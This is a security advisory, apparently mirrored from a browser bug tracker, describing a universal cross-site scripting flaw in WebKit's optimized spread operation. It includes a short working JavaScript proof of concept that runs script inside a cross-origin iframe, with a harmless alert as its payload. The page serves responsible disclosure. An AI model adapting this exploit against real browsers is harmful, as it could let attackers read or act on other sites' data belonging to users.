WebKit operationSpreadGeneric Universal Cross Site Scripting

2017.04.19
Credit: lokihardt
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

WebKit: UXSS via operationSpreadGeneric Once a spread operation is optimized, the function |operationSpreadGeneric| will be called from then on. But operationSpreadGeneric's trying to get a JSGlobalObject from the argument of a spread operation. It seems that that optimization is not implemented to the release version of Safari yet. Tested on the Nighly 10.0.2(12602.3.12.0.1, <a href="https://crrev.com/210957" title="" class="" rel="nofollow">r210957</a>) PoC: <body> <script> 'use strict'; function spread(a) { return [...a]; } let arr = Object.create([1, 2, 3, 4]); for (let i = 0; i < 0x10000; i++) { spread(arr); } let f = document.body.appendChild(document.createElement('iframe')); f.onload = () => { f.onload = null; try { spread(f.contentWindow); } catch (e) { e.constructor.constructor('alert(location)')(); } }; f.src = '<a href="https://abc.xyz/';" title="" class="" rel="nofollow">https://abc.xyz/';</a> </script> </body> This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. Found by: lokihardt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top